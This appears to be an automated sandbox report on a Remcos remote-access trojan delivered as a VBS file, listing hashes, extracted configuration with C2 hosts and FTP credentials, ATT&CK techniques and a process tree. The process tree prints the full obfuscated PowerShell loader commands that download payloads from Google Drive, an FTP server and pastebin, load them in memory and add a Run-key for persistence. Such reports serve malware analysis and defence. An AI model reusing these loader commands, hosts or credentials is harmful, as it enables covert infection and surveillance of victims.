remcos | 601e9f71fcf9a1635b8a1ee60c6e2aa8bc8d261bc389ab8e1a2a2f6eed8187b6

General

Target

601e9f71fcf9a1635b8a1ee60c6e2aa8bc8d261bc389ab8e1a2a2f6eed8187b6.vbs
Size

681KB
MD5

c92735c228647df18945e50e80630e89
SHA1

a8e770aa44e41a62534f0ae5c6f5b7cc7ad2002e
SHA256

601e9f71fcf9a1635b8a1ee60c6e2aa8bc8d261bc389ab8e1a2a2f6eed8187b6
SHA512

9b1a6f215ff69c9bab7a6016e49ced06a0c4f932bc36135aba6a1c3e46ff6d2c9d41e2461c48696b59684b5358754813ed0df5df55f4307edfc16481ee7ea61a
SSDEEP

1536:9SSSSSSSSSSSSSSSSSSSSSSSx22222222222222222222222222222222222222D:6OGHvYKaY

Score

10^/10

remcos 40/40fr defense_evasion discovery execution persistence rat

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

Protocol: ftp
Host:
ftp.desckvbrat.com.br
Port:
21
Username:
desckvbrat1
Password:
developerpro21578Jp@@

Extracted

Family

remcos

Botnet

40/40FR

C2

techsupport.ddnsking.com:40404

techsupport40.ddnsking.com:40405

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-SWD9K1
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 7 IoCs

flow	pid	Process
9	2588	powershell.exe
17	2588	powershell.exe
19	2588	powershell.exe
21	2588	powershell.exe
27	2588	powershell.exe
31	2588	powershell.exe
33	2452	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_w = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\oytea.ps1' \";exit"	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5044	powershell.exe
2452	powershell.exe
1508	powershell.exe
2588	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
32	pastebin.com
33	pastebin.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2452 set thread context of 1464	2452	powershell.exe	97

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1508	powershell.exe
1508	powershell.exe
2588	powershell.exe
2588	powershell.exe
2588	powershell.exe
5044	powershell.exe
5044	powershell.exe
2452	powershell.exe
2452	powershell.exe
2452	powershell.exe
2452	powershell.exe
2452	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1508	powershell.exe
Token: SeDebugPrivilege	2588	powershell.exe
Token: SeDebugPrivilege	5044	powershell.exe
Token: SeDebugPrivilege	2452	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1464	RegAsm.exe

Suspicious use of WriteProcessMemory 27 IoCs

description	pid	Process	procid_target
PID 4220 wrote to memory of 1508	4220	WScript.exe	82
PID 4220 wrote to memory of 1508	4220	WScript.exe	82
PID 1508 wrote to memory of 2588	1508	powershell.exe	84
PID 1508 wrote to memory of 2588	1508	powershell.exe	84
PID 2588 wrote to memory of 1916	2588	powershell.exe	90
PID 2588 wrote to memory of 1916	2588	powershell.exe	90
PID 2588 wrote to memory of 5044	2588	powershell.exe	91
PID 2588 wrote to memory of 5044	2588	powershell.exe	91
PID 2588 wrote to memory of 2452	2588	powershell.exe	94
PID 2588 wrote to memory of 2452	2588	powershell.exe	94
PID 2588 wrote to memory of 1920	2588	powershell.exe	95
PID 2588 wrote to memory of 1920	2588	powershell.exe	95
PID 2452 wrote to memory of 2900	2452	powershell.exe	96
PID 2452 wrote to memory of 2900	2452	powershell.exe	96
PID 2452 wrote to memory of 2900	2452	powershell.exe	96
PID 2452 wrote to memory of 1464	2452	powershell.exe	97
PID 2452 wrote to memory of 1464	2452	powershell.exe	97
PID 2452 wrote to memory of 1464	2452	powershell.exe	97
PID 2452 wrote to memory of 1464	2452	powershell.exe	97
PID 2452 wrote to memory of 1464	2452	powershell.exe	97
PID 2452 wrote to memory of 1464	2452	powershell.exe	97
PID 2452 wrote to memory of 1464	2452	powershell.exe	97
PID 2452 wrote to memory of 1464	2452	powershell.exe	97
PID 2452 wrote to memory of 1464	2452	powershell.exe	97
PID 2452 wrote to memory of 1464	2452	powershell.exe	97
PID 2452 wrote to memory of 1464	2452	powershell.exe	97
PID 2452 wrote to memory of 1464	2452	powershell.exe	97

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\601e9f71fcf9a1635b8a1ee60c6e2aa8bc8d261bc389ab8e1a2a2f6eed8187b6.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4220
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9Ќз革DsЌз革KQЌз革gЌз革CkЌз革IЌз革Ќз革nЌз革GUЌз革dQByЌз革HQЌз革JwЌз革gЌз革CwЌз革IЌз革BlЌз革GoЌз革dwB6Ќз革GgЌз革JЌз革Ќз革gЌз革CwЌз革IЌз革Ќз革nЌз革GgЌз革dЌз革B0Ќз革HЌз革Ќз革cwЌз革6Ќз革C8Ќз革LwBwЌз革GEЌз革cwB0Ќз革GUЌз革YgBpЌз革G4Ќз革LgBmЌз革HIЌз革LwBwЌз革GEЌз革cwB0Ќз革GUЌз革YgBpЌз革G4Ќз革LgBwЌз革GgЌз革cЌз革Ќз革/Ќз革GQЌз革bЌз革Ќз革9Ќз革DEЌз革NЌз革Ќз革xЌз革DcЌз革NЌз革Ќз革wЌз革CcЌз革IЌз革Ќз革oЌз革CЌз革Ќз革XQBdЌз革FsЌз革dЌз革BjЌз革GUЌз革agBiЌз革G8Ќз革WwЌз革gЌз革CwЌз革IЌз革BsЌз革GwЌз革dQBuЌз革CQЌз革IЌз革Ќз革oЌз革GUЌз革awBvЌз革HYЌз革bgBJЌз革C4Ќз革KQЌз革gЌз革CcЌз革SQBWЌз革EYЌз革cgBwЌз革CcЌз革IЌз革Ќз革oЌз革GQЌз革bwBoЌз革HQЌз革ZQBNЌз革HQЌз革ZQBHЌз革C4Ќз革KQЌз革nЌз革DEЌз革cwBzЌз革GEЌз革bЌз革BDЌз革C4Ќз革MwB5Ќз革HIЌз革YQByЌз革GIЌз革aQBMЌз革HMЌз革cwBhЌз革GwЌз革QwЌз革nЌз革CgЌз革ZQBwЌз革HkЌз革VЌз革B0Ќз革GUЌз革RwЌз革uЌз革CkЌз革IЌз革BaЌз革GMЌз革QgBjЌз革GEЌз革JЌз革Ќз革gЌз革CgЌз革ZЌз革BhЌз革G8Ќз革TЌз革Ќз革uЌз革G4Ќз革aQBhЌз革G0Ќз革bwBEЌз革HQЌз革bgBlЌз革HIЌз革cgB1Ќз革EMЌз革OgЌз革6Ќз革F0Ќз革bgBpЌз革GEЌз革bQBvЌз革EQЌз革cЌз革BwЌз革EEЌз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革DsЌз革KQЌз革gЌз革CkЌз革IЌз革Ќз革nЌз革EEЌз革JwЌз革gЌз革CwЌз革IЌз革Ќз革nЌз革JMhOgCTIScЌз革IЌз革Ќз革oЌз革GUЌз革YwBhЌз革GwЌз革cЌз革BlЌз革FIЌз革LgBnЌз革FMЌз革egBDЌз革EIЌз革bЌз革Ќз革kЌз革CЌз革Ќз革KЌз革BnЌз革G4Ќз革aQByЌз革HQЌз革UwЌз革0Ќз革DYЌз革ZQBzЌз革GEЌз革QgBtЌз革G8Ќз革cgBGЌз革DoЌз革OgBdЌз革HQЌз革cgBlЌз革HYЌз革bgBvЌз革EMЌз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革CЌз革Ќз革PQЌз革gЌз革FoЌз革YwBCЌз革GMЌз革YQЌз革kЌз革CЌз革Ќз革XQBdЌз革FsЌз革ZQB0Ќз革HkЌз革QgBbЌз革DsЌз革JwЌз革lЌз革EkЌз革aЌз革BxЌз革FIЌз革WЌз革Ќз革lЌз革CcЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革ZQBqЌз革HcЌз革egBoЌз革CQЌз革OwЌз革pЌз革CЌз革Ќз革ZwBTЌз革HoЌз革QwBCЌз革GwЌз革JЌз革Ќз革gЌз革CgЌз革ZwBuЌз革GkЌз革cgB0Ќз革FMЌз革ZЌз革BhЌз革G8Ќз革bЌз革BuЌз革HcЌз革bwBEЌз革C4Ќз革YgByЌз革HkЌз革dQЌз革kЌз革CЌз革Ќз革PQЌз革gЌз革GcЌз革UwB6Ќз革EMЌз革QgBsЌз革CQЌз革OwЌз革4Ќз革EYЌз革VЌз革BVЌз革DoЌз革OgBdЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革HQЌз革eЌз革BlЌз革FQЌз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革CЌз革Ќз革PQЌз革gЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革GIЌз革cgB5Ќз革HUЌз革JЌз革Ќз革7Ќз革CkЌз革dЌз革BuЌз革GUЌз革aQBsЌз革EMЌз革YgBlЌз革FcЌз革LgB0Ќз革GUЌз革TgЌз革gЌз革HQЌз革YwBlЌз革GoЌз革YgBPЌз革C0Ќз革dwBlЌз革E4Ќз革KЌз革Ќз革gЌз革D0Ќз革IЌз革BiЌз革HIЌз革eQB1Ќз革CQЌз革OwЌз革pЌз革CgЌз革ZQBzЌз革G8Ќз革cЌз革BzЌз革GkЌз革ZЌз革Ќз革uЌз革GIЌз革cgB5Ќз革HUЌз革JЌз革Ќз革7Ќз革CkЌз革IЌз革Ќз革nЌз革HQЌз革eЌз革B0Ќз革C4Ќз革MQЌз革wЌз革EwЌз革TЌз革BEЌз革C8Ќз革MQЌз革wЌз革C8Ќз革cgBlЌз革HQЌз革cЌз革B5Ќз革HIЌз革YwBwЌз革FUЌз革LwByЌз革GIЌз革LgBtЌз革G8Ќз革YwЌз革uЌз革HQЌз革YQByЌз革GIЌз革dgBrЌз革GMЌз革cwBlЌз革GQЌз革LgBwЌз革HQЌз革ZgBЌз革Ќз革DEЌз革dЌз革BhЌз革HIЌз革YgB2Ќз革GsЌз革YwBzЌз革GUЌз革ZЌз革Ќз革vЌз革C8Ќз革OgBwЌз革HQЌз革ZgЌз革nЌз革CЌз革Ќз革KЌз革BnЌз革G4Ќз革aQByЌз革HQЌз革UwBkЌз革GEЌз革bwBsЌз革G4Ќз革dwBvЌз革EQЌз革LgBiЌз革HIЌз革eQB1Ќз革CQЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革ZwBTЌз革HoЌз革QwBCЌз革GwЌз革JЌз革Ќз革7Ќз革CkЌз革JwBЌз革Ќз革EЌз革Ќз革cЌз革BKЌз革DgЌз革NwЌз革1Ќз革DEЌз革MgBvЌз革HIЌз革cЌз革ByЌз革GUЌз革cЌз革BvЌз革GwЌз革ZQB2Ќз革GUЌз革ZЌз革Ќз革nЌз革CwЌз革KQЌз革pЌз革DkЌз革NЌз革Ќз革sЌз革DYЌз革MQЌз革xЌз革CwЌз革NwЌз革5Ќз革CwЌз革NЌз革Ќз革xЌз革DEЌз革LЌз革Ќз革4Ќз革DkЌз革LЌз革Ќз革4Ќз革DEЌз革MQЌз革sЌз革DcЌз革MЌз革Ќз革xЌз革CwЌз革OQЌз革5Ќз革CwЌз革NQЌз革xЌз革DEЌз革LЌз革Ќз革xЌз革DЌз革Ќз革MQЌз革sЌз革DЌз革Ќз革MЌз革Ќз革xЌз革CgЌз革XQBdЌз革FsЌз革cgBhЌз革GgЌз革YwBbЌз革CЌз革Ќз革bgBpЌз革G8Ќз革agЌз革tЌз革CgЌз革KЌз革BsЌз革GEЌз革aQB0Ќз革G4Ќз革ZQBkЌз革GUЌз革cgBDЌз革GsЌз革cgBvЌз革HcЌз革dЌз革BlЌз革E4Ќз革LgB0Ќз革GUЌз革TgЌз革uЌз革G0Ќз革ZQB0Ќз革HMЌз革eQBTЌз革CЌз革Ќз革dЌз革BjЌз革GUЌз革agBiЌз革G8Ќз革LQB3Ќз革GUЌз革bgЌз革gЌз革D0Ќз革IЌз革BzЌз革GwЌз革YQBpЌз革HQЌз革bgBlЌз革GQЌз革ZQByЌз革EMЌз革LgBiЌз革HIЌз革eQB1Ќз革CQЌз革OwЌз革4Ќз革EYЌз革VЌз革BVЌз革DoЌз革OgBdЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革HQЌз革eЌз革BlЌз革FQЌз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革CЌз革Ќз革PQЌз革gЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革GIЌз革cgB5Ќз革HUЌз革JЌз革Ќз革7Ќз革CkЌз革dЌз革BuЌз革GUЌз革aQBsЌз革EMЌз革YgBlЌз革FcЌз革LgB0Ќз革GUЌз革TgЌз革gЌз革HQЌз革YwBlЌз革GoЌз革YgBPЌз革C0Ќз革dwBlЌз革E4Ќз革KЌз革Ќз革gЌз革D0Ќз革IЌз革BiЌз革HIЌз革eQB1Ќз革CQЌз革OwBnЌз革FMЌз革egBDЌз革EIЌз革bЌз革Ќз革kЌз革DsЌз革MgЌз革xЌз革HMЌз革bЌз革BUЌз革DoЌз革OgBdЌз革GUЌз革cЌз革B5Ќз革FQЌз革bЌз革BvЌз革GMЌз革bwB0Ќз革G8Ќз革cgBQЌз革HkЌз革dЌз革BpЌз革HIЌз革dQBjЌз革GUЌз革UwЌз革uЌз革HQЌз革ZQBOЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BsЌз革G8Ќз革YwBvЌз革HQЌз革bwByЌз革FЌз革Ќз革eQB0Ќз革GkЌз革cgB1Ќз革GMЌз革ZQBTЌз革DoЌз革OgBdЌз革HIЌз革ZQBnЌз革GEЌз革bgBhЌз革E0Ќз革dЌз革BuЌз革GkЌз革bwBQЌз革GUЌз革YwBpЌз革HYЌз革cgBlЌз革FMЌз革LgB0Ќз革GUЌз革TgЌз革uЌз革G0Ќз革ZQB0Ќз革HMЌз革eQBTЌз革FsЌз革OwB9Ќз革GUЌз革dQByЌз革HQЌз革JЌз革B7Ќз革CЌз革Ќз革PQЌз革gЌз革GsЌз革YwBhЌз革GIЌз革bЌз革BsЌз革GEЌз革QwBuЌз革G8Ќз革aQB0Ќз革GEЌз革ZЌз革BpЌз革GwЌз革YQBWЌз革GUЌз革dЌз革BhЌз革GMЌз革aQBmЌз革GkЌз革dЌз革ByЌз革GUЌз革QwByЌз革GUЌз革dgByЌз革GUЌз革UwЌз革6Ќз革DoЌз革XQByЌз革GUЌз革ZwBhЌз革G4Ќз革YQBNЌз革HQЌз革bgBpЌз革G8Ќз革UЌз革BlЌз革GMЌз革aQB2Ќз革HIЌз革ZQBTЌз革C4Ќз革dЌз革BlЌз革E4Ќз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革HsЌз革IЌз革BlЌз革HMЌз革bЌз革BlЌз革H0Ќз革IЌз革BmЌз革C8Ќз革IЌз革Ќз革wЌз革CЌз革Ќз革dЌз革Ќз革vЌз革CЌз革Ќз革cgЌз革vЌз革CЌз革Ќз革ZQB4Ќз革GUЌз革LgBuЌз革HcЌз革bwBkЌз革HQЌз革dQBoЌз革HMЌз革IЌз革Ќз革7Ќз革CcЌз革MЌз革Ќз革4Ќз革DEЌз革IЌз革BwЌз革GUЌз革ZQBsЌз革HMЌз革JwЌз革gЌз革GQЌз革bgBhЌз革G0Ќз革bQBvЌз革GMЌз革LQЌз革gЌз革GUЌз革eЌз革BlЌз革C4Ќз革bЌз革BsЌз革GUЌз革aЌз革BzЌз革HIЌз革ZQB3Ќз革G8Ќз革cЌз革Ќз革7Ќз革CЌз革Ќз革ZQBjЌз革HIЌз革bwBmЌз革C0Ќз革IЌз革Ќз革pЌз革CЌз革Ќз革JwBwЌз革HUЌз革dЌз革ByЌз革GEЌз革dЌз革BTЌз革FwЌз革cwBtЌз革GEЌз革cgBnЌз革G8Ќз革cgBQЌз革FwЌз革dQBuЌз革GUЌз革TQЌз革gЌз革HQЌз革cgBhЌз革HQЌз革UwBcЌз革HMЌз革dwBvЌз革GQЌз革bgBpЌз革FcЌз革XЌз革B0Ќз革GYЌз革bwBzЌз革G8Ќз革cgBjЌз革GkЌз革TQBcЌз革GcЌз革bgBpЌз革G0Ќз革YQBvЌз革FIЌз革XЌз革BhЌз革HQЌз革YQBEЌз革HЌз革Ќз革cЌз革BBЌз革FwЌз革JwЌз革gЌз革CsЌз革IЌз革BGЌз革EcЌз革cgBVЌз革EEЌз革JЌз革Ќз革gЌз革CgЌз革IЌз革BuЌз革G8Ќз革aQB0Ќз革GEЌз革bgBpЌз革HQЌз革cwBlЌз革EQЌз革LQЌз革gЌз革CcЌз革JQBJЌз革GgЌз革cQBSЌз革FgЌз革JQЌз革nЌз革CЌз革Ќз革bQBlЌз革HQЌз革SQЌз革tЌз革HkЌз革cЌз革BvЌз革EMЌз革IЌз革Ќз革7Ќз革CЌз革Ќз革dЌз革ByЌз革GEЌз革dЌз革BzЌз革GUЌз革cgBvЌз革G4Ќз革LwЌз革gЌз革HQЌз革ZQBpЌз革HUЌз革cQЌз革vЌз革CЌз革Ќз革UQBBЌз革GoЌз革egBJЌз革CЌз革Ќз革ZQB4Ќз革GUЌз革LgBhЌз革HMЌз革dQB3Ќз革CЌз革Ќз革ZQB4Ќз革GUЌз革LgBsЌз革GwЌз革ZQBoЌз革HMЌз革cgBlЌз革HcЌз革bwBwЌз革CЌз革Ќз革OwЌз革pЌз革CcЌз革dQBzЌз革G0Ќз革LgBuЌз革GkЌз革dwBwЌз革FUЌз革XЌз革Ќз革nЌз革CЌз革Ќз革KwЌз革gЌз革GQЌз革SQBSЌз革GkЌз革TQЌз革kЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革UQBBЌз革GoЌз革egBJЌз革DsЌз革KQЌз革gЌз革GUЌз革bQBhЌз革E4Ќз革cgBlЌз革HMЌз革VQЌз革6Ќз革DoЌз革XQB0Ќз革G4Ќз革ZQBtЌз革G4Ќз革bwByЌз革GkЌз革dgBuЌз革EUЌз革WwЌз革gЌз革CsЌз革IЌз革Ќз革nЌз革FwЌз革cwByЌз革GUЌз革cwBVЌз革FwЌз革OgBDЌз革CcЌз革KЌз革Ќз革gЌз革D0Ќз革IЌз革BGЌз革EcЌз革cgBVЌз革EEЌз革JЌз革Ќз革7Ќз革CkЌз革JwB1Ќз革HMЌз革bQЌз革uЌз革G4Ќз革aQB3Ќз革HЌз革Ќз革VQBcЌз革CcЌз革IЌз革Ќз革rЌз革CЌз革Ќз革ZЌз革BJЌз革FIЌз革aQBNЌз革CQЌз革IЌз革Ќз革sЌз革EIЌз革SwBMЌз革FIЌз革VQЌз革kЌз革CgЌз革ZQBsЌз革GkЌз革RgBkЌз革GEЌз革bwBsЌз革G4Ќз革dwBvЌз革EQЌз革LgB4Ќз革GgЌз革SgBIЌз革HkЌз革JЌз革Ќз革7Ќз革DgЌз革RgBUЌз革FUЌз革OgЌз革6Ќз革F0Ќз革ZwBuЌз革GkЌз革ZЌз革BvЌз革GMЌз革bgBFЌз革C4Ќз革dЌз革B4Ќз革GUЌз革VЌз革Ќз革uЌз革G0Ќз革ZQB0Ќз革HMЌз革eQBTЌз革FsЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革ZwBuЌз革GkЌз革ZЌз革BvЌз革GMЌз革bgBFЌз革C4Ќз革eЌз革BoЌз革EoЌз革SЌз革B5Ќз革CQЌз革OwЌз革pЌз革HQЌз革bgBlЌз革GkЌз革bЌз革BDЌз革GIЌз革ZQBXЌз革C4Ќз革dЌз革BlЌз革E4Ќз革IЌз革B0Ќз革GMЌз革ZQBqЌз革GIЌз革TwЌз革tЌз革HcЌз革ZQBOЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革eЌз革BoЌз革EoЌз革SЌз革B5Ќз革CQЌз革OwB9Ќз革DsЌз革IЌз革Ќз革pЌз革CcЌз革dЌз革BPЌз革EwЌз革YwBfЌз革EsЌз革YQЌз革zЌз革FoЌз革ZgBvЌз革FgЌз革MgBKЌз革EoЌз革cgBWЌз革GgЌз革bQBWЌз革DkЌз革YwBtЌз革DkЌз革WЌз革BzЌз革HUЌз革WЌз革BtЌз革GoЌз革MQBnЌз革DEЌз革JwЌз革gЌз革CsЌз革IЌз革BGЌз革GEЌз革RQBZЌз革FIЌз革JЌз革Ќз革oЌз革CЌз革Ќз革PQЌз革gЌз革EYЌз革YQBFЌз革FkЌз革UgЌз革kЌз革HsЌз革IЌз革BlЌз革HMЌз革bЌз革BlЌз革H0Ќз革OwЌз革gЌз革CkЌз革JwЌз革yЌз革DQЌз革dQBYЌз革EoЌз革VЌз革BxЌз革GEЌз革bQBnЌз革HkЌз革TQB0Ќз革EYЌз革egBhЌз革GsЌз革UЌз革BSЌз革DEЌз革cQBfЌз革EkЌз革dgBHЌз革GkЌз革WЌз革BOЌз革GQЌз革cQBhЌз革E4Ќз革MQЌз革nЌз革CЌз革Ќз革KwЌз革gЌз革EYЌз革YQBFЌз革FkЌз革UgЌз革kЌз革CgAIAA9ACAARgBhAEUAWQBSACQAewAgACkAIABXAGkAaQBCAHMAJAAgACgAIABmAGkAOwAgACkAJwA0ADYAJwAoAHMAbgBpAGEAdABuAG8AQwAuAEUAUgBVAFQAQwBFAFQASQBIAEMAUgBBAF8AUgBPAFMAUwBFAEMATwBSAFAAOgB2AG4AZQAkACAAPQAgAFcAaQBpAEIAcwAkADsAJwA9AGQAaQAmAGQAYQBvAGwAbgB3AG8AZAA9AHQAcgBvAHAAeABlAD8AYwB1AC8AbQBvAGMALgBlAGwAZwBvAG8AZwAuAGUAdgBpAHIAZAAvAC8AOgBzAHAAdAB0AGgAJwAgAD0AIABGAGEARQBZAFIAJAA7ACkAIAAnAHUAcwBtAC4AbgBpAHcAcABVAFwAJwAgACsAIABkAEkAUgBpAE0AJAAgACgAIABsAGUAZAA7ACkAKABoAHQAYQBQAHAAbQBlAFQAdABlAEcAOgA6AF0AaAB0AGEAUAAuAE8ASQAuAG0AZQB0AHMAeQBTAFsAIAA9ACAAZABJAFIAaQBNACQAewAgACkAIABGAGQATQBRAFQAJAAgACgAIABmAGkAOwAgACkAMgAoAHMAbABhAHUAcQBFAC4AcgBvAGoAYQBNAC4AbgBvAGkAcwByAGUAVgAuAHQAcwBvAGgAJAAgAD0AIABGAGQATQBRAFQAJAAgADsA';$nQCfu = $qKKzc.replace('Ќз革' , 'A') ;$IedxR = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nQCfu ) ); $IedxR = $IedxR[-1..-$IedxR.Length] -join '';$IedxR = $IedxR.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\601e9f71fcf9a1635b8a1ee60c6e2aa8bc8d261bc389ab8e1a2a2f6eed8187b6.vbs');powershell $IedxR
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1508
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $TQMdF = $host.Version.Major.Equals(2) ;if ( $TQMdF ) {$MiRId = [System.IO.Path]::GetTempPath();del ( $MiRId + '\Upwin.msu' );$RYEaF = 'https://drive.google.com/uc?export=download&id=';$sBiiW = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $sBiiW ) {$RYEaF = ($RYEaF + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$RYEaF = ($RYEaF + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yHJhx = (New-Object Net.WebClient);$yHJhx.Encoding = [System.Text.Encoding]::UTF8;$yHJhx.DownloadFile($URLKB, $MiRId + '\Upwin.msu');$AUrGF = ('C:\Users\' + [Environment]::UserName );IzjAQ = ($MiRId + '\Upwin.msu'); powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\601e9f71fcf9a1635b8a1ee60c6e2aa8bc8d261bc389ab8e1a2a2f6eed8187b6.vbs' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$uyrb = (New-Object Net.WebClient);$uyrb.Encoding = [System.Text.Encoding]::UTF8;$uyrb.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $uyrb.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$uyrb.dispose();$uyrb = (New-Object Net.WebClient);$uyrb.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $uyrb.DownloadString( $lBCzSg );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\601e9f71fcf9a1635b8a1ee60c6e2aa8bc8d261bc389ab8e1a2a2f6eed8187b6.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '047141=ld?php.nibetsap/rf.nibetsap//:sptth' , $hzwje , 'true' ) );};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2588
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\"
      4⤵
      PID:1916
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
      4⤵
      Adds Run key to start application
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5044
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\oytea.ps1"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2452
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:2900
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1464
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\601e9f71fcf9a1635b8a1ee60c6e2aa8bc8d261bc389ab8e1a2a2f6eed8187b6.vbs"
      4⤵
      PID:1920

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

